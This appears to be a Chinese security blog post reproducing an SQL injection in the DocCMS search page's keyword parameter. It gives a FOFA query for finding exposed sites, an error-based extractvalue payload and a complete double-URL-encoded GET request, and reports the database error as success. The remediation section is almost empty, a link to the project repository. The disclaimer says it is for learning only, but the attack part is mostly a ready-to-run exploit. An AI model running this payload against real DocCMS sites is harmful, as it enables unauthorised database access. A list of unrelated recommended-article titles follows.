DocCMS keyword SQL注入漏洞复现 [附POC]

文章目录

  • [DocCMS keyword SQL注入漏洞复现 [附POC]](#DocCMS keyword SQL注入漏洞复现 [附POC])
    • [0x01 前言](#0x01 前言)
    • [0x02 漏洞描述](#0x02 漏洞描述)
    • [0x03 影响版本](#0x03 影响版本)
    • [0x04 漏洞环境](#0x04 漏洞环境)
    • [0x05 漏洞复现](#0x05 漏洞复现)
    • [0x06 修复建议](#0x06 修复建议)

DocCMS keyword SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

DocCMS是一个开源的内容管理系统(CMS)。DocCMS是一个功能完善、易于扩展和使用的开源CMS系统。特别适用于需要动态内容管理和多用户协作的中小型网站和应用。

0x03 影响版本

复制代码
DocCMS

0x04 漏洞环境

FOFA语法:app="Doccms"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

payload

bash 复制代码
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

POC (GET)

bash 复制代码
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

PS:POC中的SQL语句需对payload二次URL编码

3.复现

首先对对payload二次URL编码

发送数据包,出现数据库报错,执行成功!!!

0x06 修复建议

复制代码
官方修复缓解措施
补丁链接:https://gitee.com/husky/DocCMS
相关推荐
琢磨先生David3 小时前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学
20242817李臻5 小时前
李臻20242817_安全文件传输系统项目报告_第9周
数据库·安全
智驱力人工智能6 小时前
无感通行与精准管控:AI单元楼安全方案的技术融合实践
人工智能·安全·智慧城市·智慧园区
见青..6 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
lally.8 小时前
2025蓝桥杯省赛网络安全组wp
web安全·蓝桥杯
CyberSecurity_zhang9 小时前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
极小狐9 小时前
极狐GitLab 的合并请求部件能干什么?
运维·git·安全·gitlab·极狐gitlab
Python私教10 小时前
Rust:安全与性能兼得的现代系统编程语言
java·安全·rust
xiaoniu66713 小时前
毕业设计-基于机器学习入侵检测系统
网络·安全·web安全
iOS开发上架哦14 小时前
charles网络抓包入门教程
网络协议·安全